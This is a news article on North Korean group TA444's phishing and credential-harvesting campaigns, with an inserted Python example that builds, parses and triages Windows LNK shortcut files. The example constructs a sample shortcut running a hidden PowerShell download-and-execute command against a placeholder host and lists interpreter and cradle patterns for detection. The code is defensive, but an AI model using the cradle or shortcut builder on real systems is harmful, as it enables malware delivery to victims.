North Korean Hackers Turn to Credential Harvesting in Latest Wave of Cyberattacks

January 25, 2023 | Ravie Lakshmanan | Cryptocurrency / Malware


A North Korean nation-state group notorious for cryptocurrency heists has been attributed to a new wave of malicious email attacks, part of a wide-ranging credential harvesting campaign targeting many industries, in what marks a significant departure from its usual tactics.

The threat actor is tracked by Proofpoint as TA444, and by the wider cybersecurity community under names including APT38, BlueNoroff, Copernicium, and Stardust Chollima.

TA444 “utilizes a variety of delivery methods and payloads, along with blockchain-related decoys, bogus job opportunities at prestigious companies, and salary adjustments to trap victims,” the enterprise security firm said in a report shared with The Hacker News.

The advanced persistent threat (APT) is unusual among state-backed groups in that its activity is financially motivated, aimed at generating illicit revenue for the Hermit Kingdom.

As such, attacks typically use phishing emails tailored to the victim’s interests. The emails carry malware-laden attachments such as LNK shortcut files and ISO optical disc images that, once opened, trigger the infection chain.
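The LNK attachments mentioned above are worth a look before anyone opens them: the fields that decide what a shortcut runs (relative target path, command-line arguments, ShowCommand) sit in the fixed-format StringData section described in MS-SHLLINK. The following Python is an added example written for this page, not code from Proofpoint or from the report it describes. The builder produces a constructed sample shortcut for testing, the interpreter list and argument patterns are this example's own triage heuristics (assumptions, not TA444 indicators), and example.invalid is a placeholder host.

```python
import re
import struct
import uuid

# Shell Link (.LNK) layout from MS-SHLLINK: a 0x4C-byte header, optional
# LinkTargetIDList and LinkInfo blocks, then StringData fields in a fixed order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
SW_SHOWMINNOACTIVE = 7  # the one ShowCommand value that keeps the launched window out of view

# StringData fields appear in this order when their LinkFlags bit is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def _string_data(text):
    # CountCharacters (2 bytes) followed by the UTF-16LE string, no terminator.
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, arguments=None, show_command=1):
    """Build a minimal, valid LNK (constructed test input; no IDList or LinkInfo)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    if arguments is not None:
        flags |= HAS_ARGUMENTS
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
    header += struct.pack("<II", flags, 0)  # LinkFlags, FileAttributes
    header += b"\x00" * 24                  # Creation/Access/Write FILETIMEs
    # FileSize, IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)
    body = _string_data(relative_path)
    if arguments is not None:
        body += _string_data(arguments)
    return header + body + b"\x00" * 4      # ExtraData TerminalBlock


def parse_lnk(data):
    """Return the header ShowCommand and the StringData fields of a LNK file."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    info = {"show_command": show_command}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            info[key] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        info[key] = data[pos:pos + count * width].decode(codec)
        pos += count * width
    return info


# Triage heuristics (this example's own assumptions, not Proofpoint's indicators).
INTERPRETERS = ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe")
ARG_MARKERS = re.compile(
    r"https?://|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|\biex\b|downloadstring", re.I)


def triage_lnk(info):
    """Return the reasons a parsed shortcut deserves a closer look (empty list if none)."""
    reasons = []
    target = (info.get("relative_path") or "").lower()
    args = info.get("arguments") or ""
    if target.endswith(INTERPRETERS):
        reasons.append("target is a script/command interpreter: " + target.rsplit("\\", 1)[-1])
    if ARG_MARKERS.search(args):
        reasons.append("arguments carry download, hidden-window or encoded-command markers")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE hides the launched window")
    return reasons


# Constructed samples: a shortcut that launches cmd.exe with a hidden PowerShell download
# cradle (placeholder host), and a harmless shortcut to a document.
MALICIOUS_LNK = build_lnk(
    "..\\..\\..\\Windows\\System32\\cmd.exe",
    '/c powershell -w hidden -c "iwr http://example.invalid/update.txt | iex"',
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk("..\\Documents\\report.docx")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(parse_lnk(blob)))
```

The parser walks the header by fixed offsets and skips the two optional variable-length blocks by their own size fields, so it stays correct for shortcuts that carry an IDList or LinkInfo even though the constructed samples omit them. For shortcuts delivered inside an ISO, mount or extract the image first and run the same check over every .lnk it contains.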

Other tactics include using compromised LinkedIn accounts belonging to legitimate business executives to approach and engage targets before distributing fraudulent links.

However, a campaign in early December 2022 marked a “significant deviation”: the phishing message prompted the recipient to click a URL that redirected to a credential harvesting page rather than delivering malware.

The email blast targeted multiple industries outside the financial sector, including education, government, and healthcare, in the United States and Canada.

Experiments aside, TA444 has also been observed extending the functionality of CageyChameleon (aka CabbageRAT) to further aid victim profiling, while maintaining a broad arsenal of post-exploitation tools to facilitate theft.

“In 2022, TA444 has taken crypto to a new level, testing different infection chains to mimic the cybercriminal ecosystem and expand revenue streams,” said Proofpoint.

The findings follow the U.S. Federal Bureau of Investigation (FBI) attributing the theft of $100 million in cryptocurrency from the Harmony Horizon Bridge in June 2022 to BlueNoroff.

“With a startup spirit and a passion for cryptocurrencies, TA444 is leading North Korea’s cash flow generation and bringing in launderable funds,” said Greg Lesnewich of Proofpoint. “This threat actor is rapidly devising new attack methods while incorporating social media as part of its modus operandi.”

The group “continues to work on using cryptocurrencies as a means of providing usable funds to the regime,” the company added.
